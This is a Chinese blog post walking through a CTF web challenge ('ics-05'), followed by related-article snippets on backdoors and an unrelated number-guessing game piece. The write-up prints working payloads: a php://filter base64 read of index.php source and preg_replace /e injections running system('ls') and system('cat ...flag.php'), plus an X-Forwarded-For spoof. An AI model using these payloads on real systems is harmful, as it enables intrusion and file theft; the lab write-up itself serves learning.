ctf随笔(2)被后门入侵的系统

最新推荐文章于 2024-05-24 22:00:00 发布
最新推荐文章于 2024-05-24 22:00:00 发布
阅读量1.3k 收藏
点赞数 1
文章标签: ctf小白 preg replace php://filter
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ma_nong_/article/details/101027838
版权

这是一道我觉得是我真正开始接触ctf的一题,涉及到php正则表达式,和php://filter协议
题目描述:破坏者会利用工控云管理系统设备维护中心的后门入侵系统
进入之后如下界面
再次点击云平台设备维护中心之后,会发现url和显示都有改变
在这里插入图片描述网址也从111.198.29.45:52706/index.php变成了111.198.29.45:52706/index.php?page=index

尝试111.198.29.45:52706/index.php?page=index.php网页显示了Ok字样
在这里插入图片描述
这样就可清楚是存在index.php这个页面的,但是我们没有办法获得该网页的信息,用php://filter协议处理一下,我们可以得到index.php的内容,协议的详细信息可参考https://blog.csdn.net/destiny1507/article/details/82347371
构造:php://filter/read=convert.base64-encode/resource=index.php

对url经过处理
在这里插入图片描述就有了一堆看不懂的码,悲伤。。但是用base64解码后我们就能看到一整篇php代码了,代码审计也让人头大,最后其实就只有这一段是有用的
在这里插入图片描述首先呢,这玩意要让你加个X-Forwarded-For头,然后就是一个正则表达式的函数preg replace,在网上搜索了一下,这个函数有一个很严重的bug
在这里插入图片描述接下来就是抓包还有实践尝试的阶段了,首先将X-Forwarded-For头改一下,然后就可以发现网页的回应开始变化:welcome my admin
在这里插入图片描述
然后就对函数里的pat,rep,sub变量进行测试,在url上再添加如下代码:
?pat=/test/e&rep=system(‘ls’)&sub=test
返回如下信息
在这里插入图片描述这个s3chahahaDir文件夹里面应该就是相应的flag了
?pat=/test/e&rep=system(‘ls+s3chahahaDir’)&sub=test
在这里插入图片描述需要注意的是,如果直接在网页上的url修改,那么’‘单引号则不会报错,如果在brup的repeater中的headers中直接写’'单引号是会报错的,这时候要把’写为%27。明显有个flag的文件夹,来让我康康
?pat=/test/e&rep=system(‘ls+s3chahahaDir/flag’)&sub=test
在这里插入图片描述果然有个flag,让我康康你是啥嗷
?pat=/test/e&rep=system(‘cat+s3chahahaDir/flag/flag.php’)&sub=test
在这里插入图片描述成功拿到flag

小崽砸
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
CTF到渗透测试【浅谈渗透测试之信息收集】
qq_43679507的博客
11-15 992
CTF到渗透测试【浅谈渗透测试之信息收集】
2-CTF解题技能之MISC基础 二
10-05
2-CTF解题技能之MISC基础 二
CTF-FTP后门利用
不知名白帽的博客
08-19 1582
CTF-FTP后门利用
[XCTF_网络安全] 攻防世界 ics-05 解题详析
qingkahui24689的博客
05-24 563
[XCTF_网络安全] 攻防世界 ics-05 解题详析,该题考察XFF及/e修正符的相关知识。
2024青少年ctf擂台挑战赛round1-php后门
weixin_71656576的博客
03-01 346
该事件是黑客利用具有git权限的账户提交了一个恶意commit,给PHP源码的zlib扩展增加了一个后门。如果该行由PHP驱动的网站运行,则将允许未经授权的访问者执行他们选择的代码。当发现请求特殊的HTTP头部中包含字符串zerodium时,则用eval执行User-Agent第8位字符后内容。利用该后门,攻击者可以执行任意命令,对于任何使用了存在后门PHP的服务器来说都有巨大的风险和威胁。使用蚁剑连接,进入虚拟终端输入 cat /flag 就得到flag了。不知道什么东西,直接开搜。
应急响应-CTF-BUUCTF-后门查杀 1
theenderofroot的博客
04-12 1315
明显的一个文件包含漏洞代码,可以GET传参自定义文件名并且自动拼接php后缀,但是没有flag。2、下载下来是一个网站源码,看来是一道代码审计题,直接把文件夹放入PhpStorm中。5、那么就只能先看include文件夹了,里面还有个include.php,重点审查。4、 uploud文件夹里有个压缩包,打开看发现是一个很正常的word文档。发现$pass变量,内容好像是MD5加密字符串,包上flag试一试。3、先看web.php,这个文件的名字有点可疑。1、快速过一下题目,下载压缩包。
ctf图文讲解-FTP后门服务利用
weixin_45441727的博客
03-17 616
首先进行靶机发现 netdiscover -r 靶机IP网段 发现靶机,对靶机进行操作系统版本扫描 nmap -sV 靶机IP 发现21端口版本号为 ProFTPD 1.3.3c 通过searchsploit查看对应版本号漏洞文件 searchsploit ProFTPD 1.3.3c 查看文件 cat /usr/share/exploitdb/exploits/linux/remote/15662.txt 很多情况下我们可以通过这些文件来判断如何去进行攻击,kail大多数都是把攻击方法
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛中,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码题目。 其他说明: 该工具具备智能判断密码...
系统后门配置策略-实验手册
最新发布
07-30
九道关,为国家培养网络安全人才,系统安全部分,仅实验手册不含靶场虚拟机
CTF工具之seay源代码审计系统(web).rar
09-16
CTF工具之seay源代码审计系统(web)】是一个专门为网络安全竞赛(CTF,Capture The Flag)设计的源代码审计工具,主要用于Web安全领域。这个工具的主要目的是帮助参赛者或者安全研究人员检测和分析Web应用程序中...
猜数字游戏 (C#)
09-13
猜数字  猜数字   猜数字可以算是一种益智类小游戏,一般两个人玩,也可以由一个人和电脑玩,可以在纸上、在网上都可以玩。这种游戏规则简单,但可以考验人的严谨和耐心。   目录   1 规则   1.1 次数限制   1.2 含重复数字的猜数字   2 解法   2.1 计算机解   2.2 推理解   2.3 代入解   2.4 其他   3 参看   规则   这个游戏的规则比较简单,一般两个人玩,一方出数字,一方猜。出数字的人要想好一个没有重复数字的4位数,不能让猜得人知道。猜的人就可以开始猜。每猜一个数字,出数者就要根据这个数字给出几A几B,其中A前面的数字表示位置正确的数的个数,而B前的数字表示数字正确而位置不对的数的个数。   如正确答案为5234,而猜的人猜5346,则是1A2B,其中有一个5的位置对了,记为1A,而3和4这两个数字对了,而位置没对,因此记为2B,合起来就是1A2B。   接着猜的人再根据出题者的几A几B继续猜,直到猜中为止。   次数限制   有的时候,这个游戏有猜测次数上的限制。根据计算机测算,这个游戏,如果以最严谨的计算,任何数字可以在7次之内猜出。而有些地方把次数限制为6次或更少,则会导致有些数可能猜不出来。而有些地方考虑到人的逻辑思维难以达到计算机的那么严谨,故设置为8次甚至10次。也有的没有次数上的限制。   含重复数字的猜数字   有一种使用范围比较狭窄的猜数字,是允许重复数字存在的猜数字,但由于其规则较复杂,故没有得到广泛的推广。其规则如下:   除了上面的规则外,如果有出现重复的数字,则重复的数字每个也只能算一次,且以最优的结果为准,   如正确答案为5543,猜的人猜5255,则在这里不能认为猜测的第一个5对正确答案第二个,根据最优结果为准的原理和每个数字只能有一次的规则,两个比较后应该为1A1B,第一个5位子正确,记为1A;猜测数字中的第三个5或第四个5和答案的第二个5匹配,只能记为1B。当然,如果有猜5267中的第一个5不能与答案中的第二个5匹配,因此只能记作1A0B。   解法   对于不同的人,常常会用到不同的解法   计算机解   通常采用的计算机解是通过排除法,即遍历所有可能的数,将不符合要求的数剃掉。   下面是一个计算机处理的例子:   for (int i = 0; i < Array.Count; i++) { if (Array与当前输出数字的比较 != 用户输入的与正确答案对比的结果) { Array.Remove(i); i--; } }      这个代码采用C#的语法,其中Array表示所有可能的数字的集合。这个例子为了方便说明,结合了语言的描述。   这样的方法充分利用了计算机计算速度快的优势,迅速排出不符合要求的数。通常第一次猜测的时间(有的引擎为第二次猜测)会在10秒左右,而随着猜测次数的不断增加,猜测的时间会越来越短,最后几乎不需要时间,这是由于集合中的数越来越少,排除需要的时间也随之减少。   推理解   计算机解释根据这种方法推广的。这种解法的中心思想是假设猜的这个数字是正确答案,即如果它为正确答案,那么这个数应该符合已经猜测的数及其结果。如已经有   1234 0A0B   那么下一步就不能猜含有1234中任一数字的数,因为如果正确答案含1234中任一,结果就不可能为0A0B。   这种解法对猜者要求较高,通常,可能会被定式思维所干扰,导致难以猜出。   基于这个解法,根据个人思维风格和起始数字选择的不同,以及对出题者出数风格的猜测,有时可以把猜测次数控制在5步内,但不总能在5步内猜出。   使用这种解法需要考虑的时间很久,和计算机解正好相反,人使用这种方法,通常随着猜测次数的增加,需要考虑的东西不断增多,反而考虑的时间会变得越来越长。   代入解   还有一种方法,在人的猜测中很常用,即将推理出不可能含有的数字,代入,察看那些数字是有的。   但这种方法其猜测次数难以确定,且通常的猜测次数比推理解多。   其他   可能还有其他的方法。
CTF后门入侵系统(攻防世界)
走在成功路上的博客
09-22 2010
CTF后门入侵系统php://filter的妙用测试题目测试题目二 php://filter的妙用 php://filterphp中特有协议流,"中间流"来处理其他流,就比如可以用:post请求通过base64将php源码编译并输出; localhost:80/index.php?php://filter/write=convert.base64-decode/resource=index...
防御windows系统激活工具的后门入侵
崔凯洋的博客
08-26 1006
实验环境:win10 64位(虚拟机) 测试人:SAYC 背景:刚装完电脑windows系统,又或者是电脑店的装机师傅来家里安装系统 这个时候使用windows激活工具来激活其实是非常危险的,因为这个时候电脑没有任何的防御措施,双击运行程序可能就会在电脑中的某个地方植入病毒并隐藏,有些激活工具自身也会做免杀 我们来分析一款工具:如下图 我们其实并不清楚这款工具有没有植入后门,所以我选择不打开exe文件,用BBedit打开上图Keys.ini,如下图 很惊奇的发现了几个个英文单词,Pr
shift后门入侵步骤
04-13 725
shift后门入侵 步骤 找到C:\WINDOWS\system32\sethc.exe 文件并将其删除 在工具文件夹选项——查看中红圈中的更改了 将 C:\WINDOWS\system32\dllcache\sethc.exe删除,这个文件夹中放着缓存,如果不删除就会自动变回去 找到 C:\WINDOWS\system32\cmd.exe 将其复制...
XCTF攻防世界web之ics-05(含自动化脚本)
weixin_50464560的博客
02-10 857
一、手解 本文借鉴以下两篇文章的指导 https://www.jianshu.com/p/5a502873635b https://blog.csdn.net/about23/article/details/95349625   全部点击一遍,只有这个可以有其他界面   题目描述是 “其他破坏者会利用工控管理系统设备维护中心的后门入侵系统” 在后面添加login.php 无果,御剑扫描也无结果,源码也找不到其他东西 再次点击上面的“平台设备
攻防世界,Web:ics-05
Pai_Space
05-04 494
其他破坏者会利用工控管理系统设备维护中心的后门入侵系统 只能进入维护中心 要入侵系统,没有多余的信息,扫目录 没东西,那只能在原本页面找 源码中有个超链接 对应的是左上角的文字“平台设备维护中心” 对应的 url,参数泄露 端口不给扫,先看看 ssh 开了没 ?page=php://filter/read=convert.base64-encode/resource=../../../../etc/passwd ssh 开了 用参数读页面源码,最下面..
CTF(Capture The Flag )环境搭建
怡红群芳的博客
03-24 3091
CTFd是目前最流行的开源CTF框架之一,是一个有Python开发的框架,侧重于易用性和可定制性。它提供了运行CTF题目所需要的一切条件,并可使用插件和主题轻松进行自定义。
ctf工具dtmf2num安装
06-12
CTF(Capture The Flag)是一种网络安全竞赛活动,其中参与者会使用各种工具来解决安全挑战。DTMF(Dual Tone Multi Frequency)是一种电话拨号系统,而dtmf2num工具则是用于将接收到的DTMF信号转换为数字,这对于某些CTF场景中的音频解码任务可能非常有用。 `dtmf2num`是一个用于处理DTMF音频并将其转换成数字的Python库,你可以通过pip进行安装。以下是安装步骤: 1. **确保你已经安装了Python**:如果你还没有安装Python,可以从官网(https://www.python.org/downloads/)下载并安装最新版本。 2. **打开命令行终端或PowerShell**:在Windows上是CMD或PowerShell,在macOS/Linux上是Terminal。 3. **运行安装命令**: ``` pip install dtmf2num ``` 运行这个命令后,pip会自动从PyPI(Python Package Index)下载并安装dtmf2num库。 4. **验证安装**: 安装完成后,你可以在Python环境中通过导入`dtmf2num`来检查是否安装成功。例如: ```python import dtmf2num ``` 如果没有错误,就说明dtmf2num已安装。 **相关问题:** 1. DTMF是什么类型的音频信号? 2. 在哪些CTF挑战中会用到dtmf2num这类工具? 3. 如何在实际的音频文件上测试dtmf2num的功能?
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值